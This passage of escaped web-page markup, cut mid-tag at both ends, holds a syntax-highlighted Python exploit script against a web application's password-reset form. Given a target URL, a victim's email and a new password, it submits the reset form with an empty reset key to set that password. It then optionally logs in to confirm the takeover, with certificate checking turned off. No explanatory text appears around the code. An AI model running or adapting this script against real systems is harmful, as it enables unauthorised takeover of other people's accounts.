data-line=\"crayon-59c82f65ac99b844907907-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-76\">76<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-2\"><span class=\"crayon-p\"># pylint: disable=C0103<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-3\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-4\"><span class=\"crayon-p\"># requires requests and lxml library<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-5\"><span class=\"crayon-p\"># pip3 install requests lxml<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-6\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-8\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urljoin<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-10\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-12\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">disable_warnings<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">exceptions<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">InsecureRequestWarning<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-14\"><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-17\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;usage:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%s http:\/\/target\/ email newpassword [username]&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;If username is specified then login will be attempted to verify password change.&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-26\"><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-27\"><span class=\"crayon-v\">USER_EMAIL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-28\"><span class=\"crayon-v\">USER_NEWPASS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-29\"><span class=\"crayon-v\">USER_NAME<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-32\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">get_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">getpath<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formname<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">getpath<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/\/form[@name=&#8221;%s&#8221;]&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formname<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-38\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">element <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;.\/\/input&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">value <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">value <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-45\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">post_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">allow_redirects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-48\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-49\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-50\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">verify<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-51\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-52\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Get reset form&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-53\"><span class=\"crayon-v\">form<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;frmZConfirm&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;resetkey&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;dummy&#8221;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-55\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Reset password&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-56\"><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">form<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-57\"><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;inConfEmail&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">USER_EMAIL<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-58\"><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;inNewPass&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;inputNewPass2&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">USER_NEWPASS<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-59\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">post_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;resetkey&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-61\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">USER_NAME<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\">#session.cookies.clear()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Test login&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Get login form&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;frmZLogin&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-66\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Login&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">form<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-69\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;inUsername&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">USER_NAME<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-70\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;inPassword&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">USER_NEWPASS<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-71\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">post_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">formaction<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formdata<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;invalidlogin&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;location&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" 